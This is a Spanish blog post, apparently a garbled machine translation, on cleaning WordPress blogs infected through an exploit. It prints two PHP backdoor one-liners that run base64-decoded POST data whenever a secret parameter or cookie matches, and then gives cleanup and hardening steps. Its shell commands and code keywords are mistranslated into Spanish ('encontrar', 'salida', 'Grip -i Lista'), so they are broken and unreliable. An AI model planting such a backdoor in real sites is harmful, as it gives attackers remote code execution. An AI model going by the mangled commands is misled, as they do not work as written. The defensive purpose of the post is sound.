Antes de leer esta publicación debe ver La publicación aquí, para entender algo. :)

Encontré en varios archivos de blogs en shealthsetts.com, códigos similares a los siguientes, que aparecieron como resultado de virus con explotador de wordpress.:

<? php if ($ _ get [‘573ABCB060974771’] ==”8E96D1B4B674E1D2″) {eval (base64_decode ($ _ post [‘archivo’])); salida; }?>

y

<? php if ($ _ cookie [44E827F9FBECA184′] ==”5CD3C94B4B1C57EA”) {eval (base64_decode ($ _ post [‘archivo’])); salida; }?>

En el caso anterior se trata del archivo xmlrpc.php de la Somnoliento, pero en un grep En el servidor, puede ver que hay muchos códigos de este tipo en fuentes.

Limpieza de archivos infectados:

Ooookkkkyouak
1. La mejor solución, después de que se haga respaldo- y limpió la base de datos, es sa BORRAR los archivos de WordPress (puede conservar wp-config.php y los archivos que no pertenecen estrictamente a la plataforma wp, después de verificarlos cuidadosamente) del servidor y cargarlos en los originales desde la versión 2.5.1 (en esta ocasión, también actualizas la versión wp :) ): http://wordpress.org/download/ . Elimine también los archivos del tema, si no confía en que pueda verificarlos cuidadosamente.

Se puede ver que los archivos de temas que nunca se usaron en el blog también se vieron afectados y simplemente cambiar el tema no soluciona este problema.

./andreea/wp-content/themes/default/index.php:<? php if ($ _ cookie [44E827F9FBECA184′] ==”5CD3C94B4B1C57EA”) {eval (base64_decode ($ _ post [‘archivo’])); salida; }?><?php get_header(); ?>

2. Busque y elimine todos los archivos que contengan: *_new.php, *_old.php, *.jpgg, *.giff, *.pngg y el archivo wp-info.txt, si existe.

encontrar . -nombre “*_new.php”
encontrar . -nombre “*_old.php”
encontrar . -nombre “*.jpgg”
encontrar . -nombre “* _giff”
encontrar . -nombre “*_pngg”
encontrar . -nombre “WP-Info.txt”

3. En /TMP , buscar y eliminar carpetas como tmpywbzt2

Limpieza SQL :

1. En la mesa wp_options Vea si existe y elimina las líneas: internal_links_cache, RIS_F541B3ABD05E7962FCAB37737F40FAD8 y WordPress_options.

2. También en wp_options, vaya a activo_plugins Y elimine si existe, un complemento que termina en una de las extensiones *_new.php, *_old.php, *.jpgg, *.giff, *.pngg o si es otra extensión sospechosa, verifique con cuidado.

3. En la mesa wp_users, vea si hay un usuario que no tiene nada que escribir a su lado, en la columna user_nicename. Elimine este usuario, pero conserve el número en la columna ID. Este usuario es posible usar "WordPress" como user_login Y parece ser creado en 00:00 0000-00-00.

4. Ve a la mesa wp_usermeta y elimine todas las líneas que pertenecen a la identificación anterior.

Después de haber realizado esta limpieza de SQL, desactive y luego active algún complemento. (en el blog -> Panel -> Complementos)

SECURITACIÓN DEL SERVER:

1. Vea qué directorios y archivos son "escondido"(Chmod 777) e intenta ponerles un chmod que ya no les permitirá escribir desde ningún nivel. (Chmod 644, por ejemplo)

encontrar . -Perm -2 –ls

2. Vea qué archivos han establecido el bit sur o patinar . Si no usa esos archivos, se les pone Chmod 0 o desinstalar el paquete que contiene. Son muy peligrosos, porque se desempeñan con los privilegios "grupo"O"raíz"Y no con los privilegios del usuario normal que ejecuta ese archivo.

Find / -Type F -Perm -04000 -ls
Find / -Type F -Perm -02000 -LS

3. Verifique qué puertos están abiertos e intente cerrar o asegurar aquellos que no se usan.

Netstat -an | Grip -i Lista

Eso es todo. Veo eso Algunos blogs son prohibidos Por Google Search y otros dicen "¡¡¡¡¡¡¡¡¡¡¡¡¡¡¡¡¡¡¡¡¡¡¡¡¡¡¡¡¡¡¡¡¡¡ . Bueno, los habrían hecho ... pero ¿qué dices si Google comienza a dinero? Todos los sitios quienes hacen SE Spam y troyanos (Troyano.clicker.html) en galletas?